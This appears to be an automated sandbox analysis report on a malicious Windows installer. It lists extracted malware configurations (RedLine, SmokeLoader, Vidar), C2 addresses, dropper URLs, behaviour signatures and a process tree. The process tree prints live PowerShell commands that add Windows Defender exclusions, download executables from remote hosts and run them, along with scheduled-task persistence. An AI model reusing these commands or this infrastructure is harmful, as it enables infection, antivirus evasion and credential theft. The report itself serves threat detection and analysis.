Resubmissions
15-10-2024 15:36
241015-s1zlzasdkc 1001-07-2024 18:32
240701-w6yteawhmq 1001-07-2024 14:52
240701-r82wmaxdnd 1001-07-2024 14:52
240701-r8syqa1dpp 1011-03-2024 21:22
240311-z8dsssgg58 1001-09-2021 13:18
210901-5bmxjspa5s 1001-09-2021 13:04
210901-te4btfspqa 1001-09-2021 05:12
210901-4wnkwm1p3j 1031-08-2021 21:47
210831-41rp97dma2 1031-08-2021 19:51
210831-359awwatje 10Analysis
-
max time kernel
130s -
max time network
644s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
21-08-2021 10:21
General
-
Target
Setup (2).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://dl.uploadgram.me/6120bc6269f31h?raw
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://dl.uploadgram.me/6120bcfeb5393h?raw
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://dl.uploadgram.me/6120c8f91373ch?raw
Extracted
Family
redline
Botnet
www
C2
185.204.109.146:54891
Extracted
Family
redline
Botnet
Second_7.5K
C2
45.14.49.200:27625
Extracted
Family
smokeloader
Version
2020
C2
http://aucmoney.com/upload/
http://thegymmum.com/upload/
http://atvcampingtrips.com/upload/
http://kuapakualaman.com/upload/
http://renatazarazua.com/upload/
http://nasufmutlu.com/upload/
rc4.i32
rc4.i32
Extracted
Family
metasploit
Version
windows/single_exec
Extracted
Family
redline
Botnet
dibild
C2
135.148.139.222:33569
Extracted
Family
redline
Botnet
19.08
C2
95.181.172.100:6795
Extracted
Family
redline
Botnet
@Gerhdhd
C2
46.8.19.177:41228
Extracted
Family
redline
Botnet
20_8_rs
C2
jekorikani.xyz:80
Extracted
Family
vidar
Version
40.1
Botnet
937
C2
https://eduarroma.tumblr.com/
Attributes
-
profile_id
937
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 2 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 15 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
-
Blocklisted process makes network request 2 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 33 IoCs
-
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 2 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 11 IoCs
Detects Themida, an advanced Windows software protection system.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 3 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 15 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Drops file in Program Files directory 5 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 36 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Kills process with taskkill 1 IoCs
-
Runs ping.exe 1 TTPs 2 IoCs
-
Script User-Agent 8 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 44 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 15 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup (2).exe"C:\Users\Admin\AppData\Local\Temp\Setup (2).exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\KC9LoCJcdUlMD1HGU_5_Oqj8.exe"C:\Users\Admin\Documents\KC9LoCJcdUlMD1HGU_5_Oqj8.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\KC9LoCJcdUlMD1HGU_5_Oqj8.exe"C:\Users\Admin\Documents\KC9LoCJcdUlMD1HGU_5_Oqj8.exe"3⤵
-
-
-
C:\Users\Admin\Documents\re5gXSGRiSUASR4uA61S4_z8.exe"C:\Users\Admin\Documents\re5gXSGRiSUASR4uA61S4_z8.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\xuvxPIejRv6FztmHksPMcUKl.exe"C:\Users\Admin\Documents\xuvxPIejRv6FztmHksPMcUKl.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\jofjsUkJjOeCP4yDpBx9DmvG.exe"C:\Users\Admin\Documents\jofjsUkJjOeCP4yDpBx9DmvG.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\jofjsUkJjOeCP4yDpBx9DmvG.exeC:\Users\Admin\Documents\jofjsUkJjOeCP4yDpBx9DmvG.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\Documents\0pZVLUVR63Tztm7oZQCP50pT.exe"C:\Users\Admin\Documents\0pZVLUVR63Tztm7oZQCP50pT.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\7ZpH1YJjEZ1iBO5uknAQ4wyO.exe"C:\Users\Admin\Documents\7ZpH1YJjEZ1iBO5uknAQ4wyO.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\7ZpH1YJjEZ1iBO5uknAQ4wyO.exeC:\Users\Admin\Documents\7ZpH1YJjEZ1iBO5uknAQ4wyO.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\Documents\JUEfkxuAALb76So533ZEiWsM.exe"C:\Users\Admin\Documents\JUEfkxuAALb76So533ZEiWsM.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\Xuz8Dk1AiXq6ZpUU1uwydzzF.exe"C:\Users\Admin\Documents\Xuz8Dk1AiXq6ZpUU1uwydzzF.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\Xuz8Dk1AiXq6ZpUU1uwydzzF.exeC:\Users\Admin\Documents\Xuz8Dk1AiXq6ZpUU1uwydzzF.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\Documents\8SSQnh8VJ2ZXOMB2EVdhfqtx.exe"C:\Users\Admin\Documents\8SSQnh8VJ2ZXOMB2EVdhfqtx.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\8SSQnh8VJ2ZXOMB2EVdhfqtx.exeC:\Users\Admin\Documents\8SSQnh8VJ2ZXOMB2EVdhfqtx.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\Documents\LeIoRzLd2z_6piMMrwMWHPMP.exe"C:\Users\Admin\Documents\LeIoRzLd2z_6piMMrwMWHPMP.exe"2⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'4⤵
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"C:\Users\Admin\AppData\Local\Temp\installer.exe"5⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'7⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'7⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'7⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\svchost32.exeC:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'9⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\system32\services32.exe"C:\Windows\system32\services32.exe"8⤵
-
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit9⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'10⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'10⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'10⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\svchost32.exeC:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit11⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'12⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"11⤵
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"8⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 39⤵
-
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'4⤵
-
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"5⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe'4⤵
-
C:\Users\Admin\AppData\Local\Temp\launcher.exe"C:\Users\Admin\AppData\Local\Temp\launcher.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\launcher.exe"{path}"6⤵
-
-
-
-
-
-
C:\Users\Admin\Documents\NO5P176fhXgDBZjHRkQsEvWf.exe"C:\Users\Admin\Documents\NO5P176fhXgDBZjHRkQsEvWf.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\zbXVIB49xC1RGNSfMJuiVQNh.exe"C:\Users\Admin\Documents\zbXVIB49xC1RGNSfMJuiVQNh.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\8389294.exe"C:\Users\Admin\AppData\Roaming\8389294.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\5100770.exe"C:\Users\Admin\AppData\Roaming\5100770.exe"3⤵
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
-
-
-
C:\Users\Admin\AppData\Roaming\1924982.exe"C:\Users\Admin\AppData\Roaming\1924982.exe"3⤵
-
-
-
C:\Users\Admin\Documents\1k_UiTYE1VIS1RgaeGXD9h_B.exe"C:\Users\Admin\Documents\1k_UiTYE1VIS1RgaeGXD9h_B.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 780 -s 6603⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 780 -s 6803⤵
- Suspicious use of SetThreadContext
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 780 -s 6443⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 780 -s 7163⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 780 -s 11603⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 780 -s 11203⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 780 -s 11643⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 780 -s 11683⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\eO17TiqSlEJ1ki0TevpMPIiI.exe"C:\Users\Admin\Documents\eO17TiqSlEJ1ki0TevpMPIiI.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\dwr1rb3LIc9d6jn95bW9DZDk.exe"C:\Users\Admin\Documents\dwr1rb3LIc9d6jn95bW9DZDk.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3120 -s 6603⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3120 -s 6723⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3120 -s 6763⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3120 -s 7483⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3120 -s 11203⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3120 -s 11603⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3120 -s 10563⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\VocvqYrjv0PS50F7XnxrJjCi.exe"C:\Users\Admin\Documents\VocvqYrjv0PS50F7XnxrJjCi.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\gJOjTgHStPQhjAPFhilDMUye.exe"C:\Users\Admin\Documents\gJOjTgHStPQhjAPFhilDMUye.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\Documents\64AAZ3NFn1v4pDaF45SgvCVe.exe"C:\Users\Admin\Documents\64AAZ3NFn1v4pDaF45SgvCVe.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\1LamdEUrG0vln5Y6X8JO8T2X.exe"C:\Users\Admin\Documents\1LamdEUrG0vln5Y6X8JO8T2X.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\1LamdEUrG0vln5Y6X8JO8T2X.exe"C:\Users\Admin\Documents\1LamdEUrG0vln5Y6X8JO8T2X.exe" -q3⤵
-
-
-
C:\Users\Admin\Documents\qcGb9v5y7YVfJDE6kI5XCMnU.exe"C:\Users\Admin\Documents\qcGb9v5y7YVfJDE6kI5XCMnU.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4456 -s 12844⤵
- Program crash
-
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Documents\DOD0VThr9ITNo52pPJVzHQFK.exe"C:\Users\Admin\Documents\DOD0VThr9ITNo52pPJVzHQFK.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1972 -s 7603⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1972 -s 7923⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1972 -s 8243⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1972 -s 9563⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1972 -s 9843⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1972 -s 10203⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1972 -s 13603⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1972 -s 12883⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\x6wZkgQfsAq3vmu6gLRSnJ8j.exe"C:\Users\Admin\Documents\x6wZkgQfsAq3vmu6gLRSnJ8j.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-VT6N1.tmp\x6wZkgQfsAq3vmu6gLRSnJ8j.tmp"C:\Users\Admin\AppData\Local\Temp\is-VT6N1.tmp\x6wZkgQfsAq3vmu6gLRSnJ8j.tmp" /SL5="$10282,138429,56832,C:\Users\Admin\Documents\x6wZkgQfsAq3vmu6gLRSnJ8j.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-6E5PB.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-6E5PB.tmp\Setup.exe" /Verysilent4⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 7646⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 8126⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 7846⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 8526⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 9566⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 9846⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 10606⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 13446⤵
- Executes dropped EXE
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 14486⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 14686⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 9006⤵
- Program crash
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet5⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629282281 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"6⤵
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-ODI34.tmp\WEATHER Manager.tmp"C:\Users\Admin\AppData\Local\Temp\is-ODI34.tmp\WEATHER Manager.tmp" /SL5="$202EE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-U8EDD.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-U8EDD.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=7157⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-U8EDD.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-U8EDD.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629282281 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"8⤵
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-TI2SH.tmp\VPN.tmp"C:\Users\Admin\AppData\Local\Temp\is-TI2SH.tmp\VPN.tmp" /SL5="$202FC,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-DAE96.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-DAE96.tmp\Setup.exe" /silent /subid=7207⤵
-
C:\Users\Admin\AppData\Local\Temp\is-96IS8.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-96IS8.tmp\Setup.tmp" /SL5="$30282,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-DAE96.tmp\Setup.exe" /silent /subid=7208⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "9⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090110⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "9⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090110⤵
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall9⤵
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install9⤵
-
-
-
-
-
-
